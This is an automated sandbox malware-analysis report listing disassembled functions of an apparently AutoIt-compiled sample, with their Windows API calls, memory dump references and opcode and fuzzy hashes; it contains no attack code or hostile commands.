                                                                                                                                                      • Part of subcall function 0074AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0074AFE3
                                                                                                                                                      • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074AFF2
                                                                                                                                                      • Part of subcall function 0074AF83: BeginPath.GDI32(?), ref: 0074B009
                                                                                                                                                      • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074B033
                                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0079EA8E
                                                                                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0079EA9B
                                                                                                                                                    • EndPath.GDI32(00000000), ref: 0079EAAB
                                                                                                                                                    • StrokePath.GDI32(00000000), ref: 0079EAB9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                    • Opcode ID: 1d29f659d608912dc14c96db4b9e8067fc0e6e9548ef11c58b36f90e4388bbb4
                                                                                                                                                    • Instruction ID: 5b4cbb3e60bf43d1f074eece8d756259020f7ebaca6abe66e057460b241f26e2
                                                                                                                                                    • Opcode Fuzzy Hash: 1d29f659d608912dc14c96db4b9e8067fc0e6e9548ef11c58b36f90e4388bbb4
                                                                                                                                                    • Instruction Fuzzy Hash: F1F05E3104525ABBDB22AF94AC0DFDA3F19AF16311F08C201FA11610E1977D9951CB9E
                                                                                                                                                    Function 0076C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0076C84A
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0076C85D
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0076C864
                                                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 0076C86B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                    • Opcode ID: 11a0342447d2bead0e0d9e3a7d002b7bdb9a92de5f2cfb9a40f544776d9e4b58
                                                                                                                                                    • Instruction ID: 9f74b4c18b4035031829efb3be4708bd905264439e8e994d5ee6e2408fd066dc
                                                                                                                                                    • Opcode Fuzzy Hash: 11a0342447d2bead0e0d9e3a7d002b7bdb9a92de5f2cfb9a40f544776d9e4b58
                                                                                                                                                    • Instruction Fuzzy Hash: 6FE06D71141228BADB311BA2DC0DFEB7F1CEF067A1F40C121BA0E95460E6B9C980CBE0
                                                                                                                                                    Function 0076B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0076B0D6
                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0076AC9D), ref: 0076B0DD
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0076AC9D), ref: 0076B0EA
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0076AC9D), ref: 0076B0F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                    • Opcode ID: c70dc806f3e7f42b6ca7e83c1731bf2fcf6646d9621f7ae99377d4b94539f71e
                                                                                                                                                    • Instruction ID: 92a61cdf6be449bb07f49404b6c957082ebf171556cc9d1e65d9b88ce5d4ae00
                                                                                                                                                    • Opcode Fuzzy Hash: c70dc806f3e7f42b6ca7e83c1731bf2fcf6646d9621f7ae99377d4b94539f71e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AE04F366412129BD7302FB15D0CF873BACAF55791F01C928EA42D6040EA6C98418B64
                                                                                                                                                    Function 0074B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0074B496
                                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0074B4A0
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0074B4B5
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0074B4BD
                                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 007ADE2B
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007ADE38
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 007ADE51
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 007ADE6A
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 007ADE8A
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007ADE95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                                    • Opcode ID: aa20783fb9e9e5889cb795a1b469c5babbc5b54ada729943890d2118de2aba43
                                                                                                                                                    • Instruction ID: 0839b90d98b9879880740367c41fae5bdb17ff27ec110741aa4e01b7c49c5016
                                                                                                                                                    • Opcode Fuzzy Hash: aa20783fb9e9e5889cb795a1b469c5babbc5b54ada729943890d2118de2aba43
                                                                                                                                                    • Instruction Fuzzy Hash: F8E0ED35104248AADB315B68AC0DFD83B11AB56336F14C766F66A980E1E7798D81DB11
                                                                                                                                                    Function 0076B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076B2DF
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0076B2EB
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0076B2F4
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0076B2FC
                                                                                                                                                      • Part of subcall function 0076AB24: GetProcessHeap.KERNEL32(00000000,?,0076A848), ref: 0076AB2B
                                                                                                                                                      • Part of subcall function 0076AB24: HeapFree.KERNEL32(00000000), ref: 0076AB32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                    • Opcode ID: 7199527cda05f9f4964dc793292af6400692d7ca6aca9e1d6bbeebae6288ce93
                                                                                                                                                    • Instruction ID: 1012141120d522a4a39a35e848e40d5589285ffb1c0f12bbc340a9ed466a104c
                                                                                                                                                    • Opcode Fuzzy Hash: 7199527cda05f9f4964dc793292af6400692d7ca6aca9e1d6bbeebae6288ce93
                                                                                                                                                    • Instruction Fuzzy Hash: BDE0B63A104005FBCB112BA5EC08D99FBA6FF88321714C322F62582571DB3AA871EF95
                                                                                                                                                    Function 007AB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: 22d12057b854eae7b15c7b2ef890c224e1c4666bfefc2937d5b338a74c794933
                                                                                                                                                    • Instruction ID: cb0893e9e695f8906d69a5e1118d55d610c3723e4301e30fab6d1fd29b5704cc
                                                                                                                                                    • Opcode Fuzzy Hash: 22d12057b854eae7b15c7b2ef890c224e1c4666bfefc2937d5b338a74c794933
                                                                                                                                                    • Instruction Fuzzy Hash: 56E012B5500204EFDB205F708888B6E7BA9EB4C394F11CA1AFC5A8B251EB7C9C418B58
                                                                                                                                                    Function 007AB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: ad1809411887cf581c0db5a31268a3588ef57fb7314d74909412d5936d5b61b0
                                                                                                                                                    • Instruction ID: 13ebd484fb6dc3b3be0a75b65defd7e1e1b854b9622e3e1b9de7f378e61cb5b6
                                                                                                                                                    • Opcode Fuzzy Hash: ad1809411887cf581c0db5a31268a3588ef57fb7314d74909412d5936d5b61b0
                                                                                                                                                    • Instruction Fuzzy Hash: 73E04FB5500200EFDB105F70C84CA2D7BA9EB4C394F11C515FD5A87211EB7C9C018B14
                                                                                                                                                    Function 0076DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0076DEAA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                                                    • Opcode ID: c6be7991148747d0fa94a107c13e205f1c2d523a6e199053da1018be5b0a6b89
                                                                                                                                                    • Instruction ID: 277619f44f690d3edcd95a6e1176d9dacb7e0447799d9df3531d2f4e105a447f
                                                                                                                                                    • Opcode Fuzzy Hash: c6be7991148747d0fa94a107c13e205f1c2d523a6e199053da1018be5b0a6b89
                                                                                                                                                    • Instruction Fuzzy Hash: D0913774B10601AFDB24DF64C888B6AB7B9BF48710F10856EF95ACB291DB75EC41CB60
                                                                                                                                                    Function 0077290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy
                                                                                                                                                    • String ID: I/z$I/z
                                                                                                                                                    • API String ID: 3048848545-4222651952
                                                                                                                                                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                                                                                    • Instruction ID: fb54ccf9eafb29005610575b42ac3c0bdb61348a4753e55ca8214915a542e775
                                                                                                                                                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                                                                                    • Instruction Fuzzy Hash: B241C231900216AACF25EF98C4419FCB7B0EF08390F55D05AE995B7193DB386E83DB50
                                                                                                                                                    Function 0074BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 0074BCDA
                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0074BCF3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                    • Opcode ID: b0f58b9fe3c6930dee012270e72564331ec95e1353df4f1221660aacbb2c19f3
                                                                                                                                                    • Instruction ID: 006d5b84976326a18a705c01ad734e948ac20ded518e2d924a573f20b09d282d
                                                                                                                                                    • Opcode Fuzzy Hash: b0f58b9fe3c6930dee012270e72564331ec95e1353df4f1221660aacbb2c19f3
                                                                                                                                                    • Instruction Fuzzy Hash: 46514971408748EBE320AF14DC89BAFBBECFF98354F81485DF1C8410A2DB7595A98766
                                                                                                                                                    Function 0077C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 007344ED: __fread_nolock.LIBCMT ref: 0073450B
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0077C65D
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0077C670
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                                                    • String ID: FILE
                                                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                                                    • Opcode ID: 195933daee30ab34c8bc5552fa682ae05f6dd9a8dc96aedded8dc1794a551bbe
                                                                                                                                                    • Instruction ID: 2007cd841eabd412e22e7567860a2de2d5dd91c9fe2bdf9358aa436885ebc471
                                                                                                                                                    • Opcode Fuzzy Hash: 195933daee30ab34c8bc5552fa682ae05f6dd9a8dc96aedded8dc1794a551bbe
                                                                                                                                                    • Instruction Fuzzy Hash: E741F472A0020ABBDF219BA4DC85FEF77B9AF49704F004079F605EB181D778AA04CB60
                                                                                                                                                    Function 0079A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0079A85A
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0079A86F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: '
                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                    • Opcode ID: 8125dcd148dc2c9da5562213a694233613f39719584c35a633a47f53dd499867
                                                                                                                                                    • Instruction ID: 9bdee3487aba7a3b0ac9198f683a6b0d407308c0b006ab29a492bc4345038b24
                                                                                                                                                    • Opcode Fuzzy Hash: 8125dcd148dc2c9da5562213a694233613f39719584c35a633a47f53dd499867
                                                                                                                                                    • Instruction Fuzzy Hash: A241D674A01209AFDF14CFA8D881BEA7BB9FB08354F14416AE905AB341D774A941CFA1
                                                                                                                                                    Function 0079975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0079980E
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0079984A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                    • Opcode ID: 562e21a27fcd470302ec7f9a7812a60818a2b635ad059979d2d8aa6a64e534c8
                                                                                                                                                    • Instruction ID: 1ea2e35e75910c4fba23d234397d31a0daa4724ab0e340d392e060675f9a27e3
                                                                                                                                                    • Opcode Fuzzy Hash: 562e21a27fcd470302ec7f9a7812a60818a2b635ad059979d2d8aa6a64e534c8
                                                                                                                                                    • Instruction Fuzzy Hash: FB316A71110604AAEB209F68DC81FBB73A9FF59764F00861DF9A9C7190DA39AC81D764
                                                                                                                                                    Function 00775157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007751C6
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00775201
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                                    • Opcode ID: 638c4fc8d6a5d11bcc1442c86ae4d6212b8b85995d0bdee71954548c364205b7
                                                                                                                                                    • Instruction ID: 16e8bd101ce84e8cfef2ab8c0194cd4588f21c444e738a7f6701644ddb036a2d
                                                                                                                                                    • Opcode Fuzzy Hash: 638c4fc8d6a5d11bcc1442c86ae4d6212b8b85995d0bdee71954548c364205b7
                                                                                                                                                    • Instruction Fuzzy Hash: 8D31E671600708DBEF24CF99D849BAEBBF4FF453D0F148059E989A61A1D7F89944CB50
                                                                                                                                                    Function 0078658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
